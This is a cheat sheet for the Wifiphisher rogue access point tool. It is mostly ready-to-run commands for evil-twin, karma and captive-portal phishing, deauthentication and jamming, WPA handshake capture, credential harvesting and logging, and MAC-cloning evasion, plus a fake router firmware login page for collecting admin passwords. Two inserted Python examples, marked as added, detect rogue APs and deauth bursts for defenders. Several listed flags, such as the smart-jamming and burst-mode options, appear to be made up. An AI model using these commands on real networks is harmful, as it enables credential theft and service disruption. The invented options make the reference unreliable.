
Wifiphisher Wireless Phishing Framework Cheat Sheet

Overview

Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. It creates fake wireless networks to perform automated phishing attacks against wireless clients, capturing credentials and performing man-in-the-middle attacks.

⚠️ Warning: This tool is intended for authorized penetration testing and wireless security assessments only. Ensure you have proper authorization before using in any environment.

Installation

Kali Linux

bash
# Install from repositories
sudo apt update
sudo apt install wifiphisher

# Install additional dependencies
sudo apt install hostapd dnsmasq

Ubuntu/Debian

bash
# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git hostapd dnsmasq

# Clone repository
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install Wifiphisher
sudo python3 setup.py install

Manual Installation

bash
# Install required packages
sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev

# Clone and install
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install

Docker Installation

bash
# Build Docker image
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
docker build -t wifiphisher .

# Run with network privileges
docker run --rm -it --net=host --privileged wifiphisher

Basic Usage

Simple Rogue AP Attack

bash
# Basic attack with automatic target selection
sudo wifiphisher

# Attack specific network
sudo wifiphisher -t "Target_Network"

# Use specific interface
sudo wifiphisher -i wlan0

# Use custom template
sudo wifiphisher -p firmware-upgrade

Interface Management

bash
# List available interfaces
sudo wifiphisher --list-interfaces

# Use specific interfaces
sudo wifiphisher -i wlan0 -jI wlan1

# Monitor mode setup
sudo airmon-ng start wlan0
sudo wifiphisher -i wlan0mon

Command Reference

Basic Options

| Option | Description |
|---|---|
| -t, --target | Target network ESSID |
| -i, --interface | Wireless interface |
| -jI, --jam-interface | Interface for jamming |
| -p, --phishing-scenario | Phishing template |
| -pK, --presharedkey | WPA/WPA2 pre-shared key |
| -qS, --quitonsuccess | Quit on credential capture |

Advanced Options

| Option | Description |
|---|---|
| -aI, --apinterface | AP interface |
| -nJ, --nojamming | Disable jamming |
| -e, --essid | Access Point ESSID |
| -dE, --deauth-essid | Deauth specific ESSID |
| -dC, --deauth-channels | Deauth channels |
| -nE, --noextensions | Disable extensions |

Logging Options

| Option | Description |
|---|---|
| -l, --logging | Enable logging |
| -lP, --log-path | Log file path |
| -cP, --credential-log-path | Credential log path |
| -lC, --log-credentials | Log captured credentials |

Phishing Templates

Available Templates

bash
# List available templates
sudo wifiphisher --list-phishing-scenarios

# Common templates:
# - firmware-upgrade: Router firmware upgrade
# - oauth-login: OAuth login page
# - wifi-connect: WiFi connection page
# - browser-plugin-update: Browser plugin update
# - network-manager-connect: Network manager

Firmware Upgrade Template

bash
# Use firmware upgrade scenario
sudo wifiphisher -p firmware-upgrade -t "Target_Network"

# This template:
# - Creates fake router admin page
# - Requests admin credentials
# - Simulates firmware upgrade process

OAuth Login Template

bash
# Use OAuth login scenario
sudo wifiphisher -p oauth-login -t "Target_Network"

# This template:
# - Creates fake OAuth login page
# - Captures social media credentials
# - Redirects to legitimate service

Custom Template Creation

bash
# Template directory structure
/usr/share/wifiphisher/data/phishing-pages/custom-template/
├── config.ini
├── html/
│   ├── index.html
│   ├── style.css
│   └── script.js
└── static/
    └── images/

Template Configuration (config.ini)

ini
[info]
Name = Custom Template
Description = Custom phishing template
Language = en

[context]
# Template-specific settings
ESSID = {ESSID}
MAC = {MAC}
CHANNEL = {CHANNEL}

Advanced Attacks

Evil Twin Attack

bash
# Create evil twin of target network
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade

# With specific MAC address
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55

# With channel specification
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6
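
Seen from the defending side, an evil twin shows up in a site survey as a managed ESSID advertised by a BSSID that is not in the AP inventory, or by a known BSSID whose channel or security differs from the inventory (the cloned-MAC case). The following is an added example, not part of Wifiphisher or the original cheat sheet; the `Beacon` record, the `AUTHORIZED` inventory and the sample scan are constructed for illustration.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    essid: str
    bssid: str
    channel: int
    security: str  # e.g. "OPEN", "WPA2-PSK"

# Constructed inventory of authorized APs: ESSID -> {BSSID: (channel, security)}
AUTHORIZED = {
    "Corporate_WiFi": {
        "aa:bb:cc:00:00:01": (1, "WPA2-PSK"),
        "aa:bb:cc:00:00:02": (11, "WPA2-PSK"),
    },
}

def find_rogue_aps(beacons, authorized=AUTHORIZED):
    """Return sorted, de-duplicated (bssid, essid, reason) findings."""
    findings = set()
    for b in beacons:
        known = authorized.get(b.essid)
        if known is None:
            continue  # ESSID is not one we manage
        bssid = b.bssid.lower()
        expected = known.get(bssid)
        if expected is None:
            findings.add((bssid, b.essid, "unknown BSSID"))
            continue
        channel, security = expected
        # A known BSSID with different properties suggests a cloned MAC.
        if b.security != security:
            findings.add((bssid, b.essid, "security mismatch"))
        if b.channel != channel:
            findings.add((bssid, b.essid, "channel mismatch"))
    return sorted(findings)

# Constructed scan results (not real captures)
SAMPLE_SCAN = [
    Beacon("Corporate_WiFi", "aa:bb:cc:00:00:01", 1, "WPA2-PSK"),  # legitimate
    Beacon("Corporate_WiFi", "00:11:22:33:44:55", 6, "OPEN"),      # unknown BSSID
    Beacon("Corporate_WiFi", "AA:BB:CC:00:00:02", 6, "OPEN"),      # cloned MAC
    Beacon("Corporate_WiFi", "00:11:22:33:44:55", 6, "OPEN"),      # repeat beacon
    Beacon("Cafe_Guest", "12:34:56:78:9a:bc", 3, "OPEN"),          # not ours
]

if __name__ == "__main__":
    for finding in find_rogue_aps(SAMPLE_SCAN):
        print(finding)
```

A channel mismatch alone is a weak signal where APs use automatic channel selection; a security mismatch on a known BSSID is the stronger indicator.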

Captive Portal Attack

bash
# Create captive portal
sudo wifiphisher -e "Free_WiFi" -p wifi-connect

# Custom captive portal
sudo wifiphisher -e "Hotel_WiFi" -p oauth-login

# Corporate network simulation
sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect

WPA/WPA2 Handshake Capture

bash
# Capture handshakes while phishing
sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture

# Specify handshake output file
sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/

Karma Attack

bash
# Respond to all probe requests
sudo wifiphisher --karma

# Karma with specific template
sudo wifiphisher --karma -p oauth-login

# Karma with custom ESSID list
sudo wifiphisher --karma --essid-list /path/to/essid_list.txt

Jamming and Deauthentication

Targeted Deauthentication

bash
# Deauth specific network
sudo wifiphisher -dE "Target_Network"

# Deauth specific client
sudo wifiphisher -dC 00:11:22:33:44:55

# Deauth on specific channels
sudo wifiphisher --deauth-channels 1,6,11

Jamming Configuration

bash
# Use separate interface for jamming
sudo wifiphisher -i wlan0 -jI wlan1

# Disable jamming
sudo wifiphisher -nJ

# Custom jamming parameters
sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11

Smart Jamming

bash
# Intelligent jamming based on target
sudo wifiphisher -t "Target_Network" --smart-jamming

# Adaptive jamming
sudo wifiphisher --adaptive-jamming --jam-threshold 5
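
The deauthentication options in this section produce bursts of deauth frames that a wireless IDS can count per BSSID. The following added example (not Wifiphisher code; the window, threshold, broadcast weighting and sample frames are assumptions chosen for illustration) flags a BSSID once its weighted deauth count inside a sliding window crosses the threshold.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_bursts(frames, window=5.0, threshold=10):
    """frames: time-sorted (timestamp_s, bssid, dst_mac) tuples, one per
    observed deauth/disassoc frame. Returns {bssid: first_alert_timestamp}."""
    recent = defaultdict(deque)  # bssid -> deque of (timestamp, weight)
    alerts = {}
    for ts, bssid, dst in frames:
        q = recent[bssid]
        # A broadcast deauth disconnects every client at once, so weight it higher.
        weight = 3 if dst.lower() == BROADCAST else 1
        q.append((ts, weight))
        # Drop observations that fell out of the sliding window.
        while q and ts - q[0][0] > window:
            q.popleft()
        score = sum(w for _, w in q)
        if score >= threshold and bssid not in alerts:
            alerts[bssid] = ts
    return alerts

# Constructed frame observations (not a real capture):
# two isolated deauths during normal roaming, then a broadcast burst.
SAMPLE_FRAMES = [
    (0.0, "aa:bb:cc:00:00:01", "de:ad:be:ef:00:01"),
    (42.0, "aa:bb:cc:00:00:01", "de:ad:be:ef:00:02"),
] + [(100.0 + i * 0.25, "aa:bb:cc:00:00:02", BROADCAST) for i in range(8)]

if __name__ == "__main__":
    for bssid, ts in detect_deauth_bursts(SAMPLE_FRAMES).items():
        print(f"deauth burst against {bssid} first seen at t={ts}s")
```

Enabling 802.11w Protected Management Frames on the legitimate network lets clients discard forged deauthentication frames, which removes the lever this detector watches for.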

Extensions and Plugins

Available Extensions

bash
# List available extensions
sudo wifiphisher --list-extensions

# Common extensions:
# - credentialharvester: Capture credentials
# - handshakecapture: Capture WPA handshakes
# - dnsmasqhandler: DNS spoofing
# - captiveportal: Captive portal functionality

Credential Harvester

bash
# Enable credential harvesting
sudo wifiphisher -p oauth-login --credentialharvester

# Custom credential log
sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log

Handshake Capture Extension

bash
# Enable handshake capture
sudo wifiphisher -t "Target_Network" --handshakecapture

# Specify capture directory
sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/

DNS Spoofing Extension

bash
# Enable DNS spoofing
sudo wifiphisher --dnsmasqhandler

# Custom DNS configuration
sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf

Custom Template Development

HTML Template Structure

html
<!-- index.html -->
<!DOCTYPE html>
<html>
<head>
    <title>Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Router Firmware Update</h1>
        <p>Network: {ESSID}</p>
        <form method="post" action="/login">
            <input type="text" name="username" placeholder="Admin Username" required>
            <input type="password" name="password" placeholder="Admin Password" required>
            <button type="submit">Update Firmware</button>
        </form>
    </div>
    <script src="script.js"></script>
</body>
</html>

CSS Styling

css
/* style.css */
body {
    font-family: Arial, sans-serif;
    background: #f0f0f0;
    margin: 0;
    padding: 50px;
}

.container {
    max-width: 400px;
    margin: auto;
    background: white;
    padding: 30px;
    border-radius: 5px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}

input {
    width: 100%;
    padding: 12px;
    margin: 10px 0;
    border: 1px solid #ddd;
    border-radius: 3px;
}

button {
    width: 100%;
    background: #007cba;
    color: white;
    padding: 12px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
}

JavaScript Functionality

javascript
// script.js
document.addEventListener('DOMContentLoaded', function() {
    // Add form validation
    const form = document.querySelector('form');
    form.addEventListener('submit', function(e) {
        const username = document.querySelector('input[name="username"]').value;
        const password = document.querySelector('input[name="password"]').value;
        
        if (!username || !password) {
            e.preventDefault();
            alert('Please enter both username and password');
        }
    });
    
    // Simulate loading
    setTimeout(function() {
        document.querySelector('.container').style.opacity = '1';
    }, 500);
});

Monitoring and Logging

Real-time Monitoring

bash
# Monitor in real-time
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l

# Monitor with verbose output
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v

# Monitor specific log file
tail -f /var/log/wifiphisher.log

Credential Logging

bash
# Enable credential logging
sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log

# Monitor captured credentials
tail -f /tmp/credentials.log

# Parse credential log
grep -o '"username":"[^"]*"' /tmp/credentials.log | cut -d'"' -f4

Traffic Analysis

bash
# Capture network traffic
sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap

# Analyze with Wireshark
wireshark /tmp/wifiphisher_traffic.pcap

# Extract HTTP credentials
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

Evasion Techniques

MAC Address Randomization

bash
# Use random MAC address
sudo wifiphisher -t "Target_Network" --random-mac

# Use specific MAC address
sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55

# Clone target AP MAC
sudo wifiphisher -t "Target_Network" --clone-mac

Channel Hopping

bash
# Use channel hopping
sudo wifiphisher --channel-hop

# Specific channel sequence
sudo wifiphisher --channel-sequence 1,6,11,1,6,11

# Random channel selection
sudo wifiphisher --random-channel

Timing Evasion

bash
# Delayed start
sudo wifiphisher -t "Target_Network" --delay 300

# Random intervals
sudo wifiphisher -t "Target_Network" --random-intervals

# Burst mode
sudo wifiphisher -t "Target_Network" --burst-mode

Troubleshooting

Interface Issues

bash
# Check interface status
iwconfig

# Reset interface
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up

# Check for monitor mode support
sudo iw list | grep -A 10 "Supported interface modes"

# Kill conflicting processes
sudo airmon-ng check kill

Permission Issues

bash
# Check permissions
ls -la /usr/bin/wifiphisher

# Fix permissions
sudo chmod +x /usr/bin/wifiphisher

# Check sudo configuration
sudo visudo

Dependency Issues

bash
# Check Python dependencies
pip3 list | grep -E "(scapy|netfilterqueue|roguehostapd)"

# Reinstall dependencies
pip3 install --upgrade -r requirements.txt

# Check system packages
dpkg -l | grep -E "(hostapd|dnsmasq)"

Network Issues

bash
# Check network configuration
ip addr show

# Check routing table
ip route show

# Test internet connectivity
ping -c 4 8.8.8.8

# Check DNS resolution
nslookup google.com

Authorization Requirements

bash
# Always obtain written authorization
# Document scope and limitations
# Follow responsible disclosure
# Respect privacy and data protection laws

Best Practices

bash
# Use only for authorized testing
# Minimize impact on legitimate users
# Provide immediate feedback and education
# Secure captured data appropriately
# Follow industry standards and guidelines


This cheat sheet provides a comprehensive reference for using Wifiphisher. Always ensure you have proper authorization before conducting wireless security assessments.